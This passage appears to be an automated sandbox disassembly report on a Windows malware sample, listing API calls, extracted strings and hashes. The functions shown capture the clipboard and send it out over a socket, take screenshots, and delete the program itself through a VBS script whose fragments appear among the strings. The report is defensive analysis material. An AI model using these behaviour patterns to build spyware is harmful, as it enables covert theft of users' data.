                                                                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                      • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                      • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                    • String ID: """, 0$.vbs$0%s$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$hdF$open
                                                                    • API String ID: 1913171305-182812083
                                                                    • Opcode ID: 82fd75276cdd36021d5828b555f4a6409fe0754caff0e17de8e69467b3715207
                                                                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                    • Opcode Fuzzy Hash: 82fd75276cdd36021d5828b555f4a6409fe0754caff0e17de8e69467b3715207
                                                                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                    • String ID: \ws2_32$\wship6$getaddrinfo
                                                                    • API String ID: 2490988753-3078833738
                                                                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                    • _free.LIBCMT ref: 004512FF
                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                    • _free.LIBCMT ref: 00451321
                                                                    • _free.LIBCMT ref: 00451336
                                                                    • _free.LIBCMT ref: 00451341
                                                                    • _free.LIBCMT ref: 00451363
                                                                    • _free.LIBCMT ref: 00451376
                                                                    • _free.LIBCMT ref: 00451384
                                                                    • _free.LIBCMT ref: 0045138F
                                                                    • _free.LIBCMT ref: 004513C7
                                                                    • _free.LIBCMT ref: 004513CE
                                                                    • _free.LIBCMT ref: 004513EB
                                                                    • _free.LIBCMT ref: 00451403
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                    • _free.LIBCMT ref: 10007CFB
                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                    • _free.LIBCMT ref: 10007D1D
                                                                    • _free.LIBCMT ref: 10007D32
                                                                    • _free.LIBCMT ref: 10007D3D
                                                                    • _free.LIBCMT ref: 10007D5F
                                                                    • _free.LIBCMT ref: 10007D72
                                                                    • _free.LIBCMT ref: 10007D80
                                                                    • _free.LIBCMT ref: 10007D8B
                                                                    • _free.LIBCMT ref: 10007DC3
                                                                    • _free.LIBCMT ref: 10007DCA
                                                                    • _free.LIBCMT ref: 10007DE7
                                                                    • _free.LIBCMT ref: 10007DFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                    • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                    • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                    • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00419FB9
                                                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                    • API String ID: 489098229-1431523004
                                                                    • Opcode ID: b499b51959d3cf4ef35a9152d00fbf1dc41e2353d24a6a9f0d4696b7fe210d5a
                                                                    • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                    • Opcode Fuzzy Hash: b499b51959d3cf4ef35a9152d00fbf1dc41e2353d24a6a9f0d4696b7fe210d5a
                                                                    • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                    • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                    • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                    • String ID:
                                                                    • API String ID: 3658366068-0
                                                                    • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                    • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                                    APIs
                                                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                                    • GetLastError.KERNEL32 ref: 00455CEF
                                                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                                    • GetLastError.KERNEL32 ref: 00455D0C
                                                                    • __dosmaperr.LIBCMT ref: 00455D15
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                    • GetLastError.KERNEL32 ref: 00455EB1
                                                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                    • String ID: H
                                                                    • API String ID: 4237864984-2852464175
                                                                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                    • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                    • __freea.LIBCMT ref: 00454003
                                                                    • __freea.LIBCMT ref: 0045400F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                    • String ID: \@E
                                                                    • API String ID: 201697637-1814623452
                                                                    • Opcode ID: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                                                                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                    • Opcode Fuzzy Hash: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                                                                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: \&G$\&G$`&G
                                                                    • API String ID: 269201875-253610517
                                                                    • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                    • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 65535$udp
                                                                    • API String ID: 0-1267037602
                                                                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                    APIs
                                                                    • OpenClipboard.USER32 ref: 00416941
                                                                    • EmptyClipboard.USER32 ref: 0041694F
                                                                    • CloseClipboard.USER32 ref: 00416955
                                                                    • OpenClipboard.USER32 ref: 0041695C
                                                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                    • CloseClipboard.USER32 ref: 00416984
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                    • String ID: !D@$hdF
                                                                    • API String ID: 2172192267-3475379602
                                                                    • Opcode ID: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                    • Opcode Fuzzy Hash: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                    • __dosmaperr.LIBCMT ref: 0043A937
                                                                    • _free.LIBCMT ref: 0043A943
                                                                    • _free.LIBCMT ref: 0043A94A
